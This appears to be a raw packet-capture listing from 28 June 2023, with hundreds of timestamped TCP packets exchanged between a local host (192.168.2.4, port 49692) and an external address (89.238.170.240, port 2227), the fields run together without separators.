                                                Jun 28, 2023 01:59:22.920368910 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.920437098 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.920460939 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.920566082 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.920578003 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.920599937 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.920651913 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.920680046 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.920695066 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.920778990 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.920795918 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.920890093 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958168030 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958228111 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958261967 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958298922 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958328962 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958340883 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958370924 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958410025 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958424091 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958424091 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958466053 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958467007 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958467007 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958551884 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958592892 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958632946 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958638906 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958640099 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958672047 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958679914 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958679914 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958717108 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958738089 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958755016 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958787918 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958812952 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.958868980 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958915949 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958954096 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.958954096 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.959012032 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.959012032 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.959053040 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.959127903 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.959150076 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.959220886 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.959253073 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.959295988 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.959317923 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.959331036 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.959359884 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.959384918 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.995644093 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.995688915 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.995826006 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.995826006 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.995860100 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.995908022 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.996032953 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.996061087 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.996061087 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.996131897 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.996242046 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.996309042 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.996351957 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.996391058 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.996397972 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.996397972 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.996397972 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.996460915 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.996498108 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.996572971 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.996572971 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.996656895 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.996690035 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.996851921 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.996946096 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.996968985 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.996968985 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.996980906 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997024059 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997024059 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997083902 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997186899 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997220993 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997278929 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997278929 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997319937 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997319937 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997328997 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997371912 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997414112 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997505903 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997540951 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997612953 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997612953 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997612953 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997653008 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997661114 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997661114 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997699022 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997728109 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997735977 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997767925 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997782946 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997821093 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997824907 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997859955 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997864962 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.997888088 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997931004 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.997981071 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998049021 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998122931 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998155117 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998188019 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998203993 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998203993 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998258114 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998298883 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998333931 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998367071 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998367071 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998395920 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998451948 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998475075 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998511076 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998548031 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998548985 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998579025 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998605013 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998714924 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998759031 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998792887 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998799086 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998828888 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998828888 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998858929 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998864889 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.998910904 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.998910904 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.999032974 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.999090910 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.999109983 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.999161005 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.999171972 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.999209881 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.999244928 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.999267101 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.999268055 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.999279976 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.999310017 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.999351978 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.033097029 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.033138990 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.033176899 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.033225060 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.033252954 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.033266068 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.033303976 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.033313036 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.033363104 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.033363104 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.033423901 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.033494949 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.033622980 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.033696890 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.033828020 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.033898115 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.033993006 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.034064054 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.034146070 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.034224033 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.034240961 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.034317970 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.034389973 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.034456015 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.034738064 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.034807920 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.034841061 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.034909010 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.035105944 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.035178900 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.035206079 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.035269976 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.035413027 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.035450935 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.035481930 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.035509109 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.035706043 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.035742044 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.035815001 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.035815001 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.036130905 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.036207914 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.036237955 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.036313057 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.036315918 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.036354065 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.036375046 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.036396027 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.036426067 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.036431074 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.036457062 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.036509991 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.036537886 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.036572933 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.036607027 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.036616087 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.036643982 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.036665916 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.036988020 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037023067 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037051916 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037064075 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037081957 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037103891 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037138939 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037147045 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037180901 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037183046 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037219048 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037220955 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037246943 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037261009 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037282944 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037331104 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037369967 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037410975 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037445068 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037445068 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037477016 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037491083 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037527084 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037528038 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037561893 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037564993 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037611008 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037636995 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037667036 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037712097 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037745953 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037745953 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037775993 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037816048 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037847996 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037894011 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037919044 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.037946939 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.037952900 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038008928 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038094044 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038135052 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038161993 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038180113 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038192987 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038220882 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038247108 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038254976 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038280964 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038322926 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038420916 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038460970 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038495064 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038497925 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038527012 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038530111 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038551092 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038594007 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038631916 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038716078 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038738012 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038798094 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038800955 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038876057 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038902998 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038934946 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.038968086 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.038994074 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039021015 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039088964 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039098978 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039129972 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039189100 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039189100 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039221048 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039302111 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039349079 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039422035 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039434910 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039508104 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039567947 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039602995 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039638042 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039661884 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039661884 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039666891 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039704084 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039731026 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039840937 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039871931 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039910078 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039910078 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039942980 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039943933 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.039968014 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.039978981 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040002108 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040011883 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040043116 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040080070 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040194988 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040230036 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040294886 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040296078 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040338039 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040366888 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040395975 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040409088 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040448904 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040448904 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040489912 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040564060 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040582895 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040612936 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040641069 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040647030 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040673971 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040699005 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040728092 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040792942 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040808916 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040900946 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040909052 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040927887 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.040975094 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.040976048 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041096926 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041136026 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041168928 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041178942 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041197062 CEST22274969289.238.170.240192.168.2.4
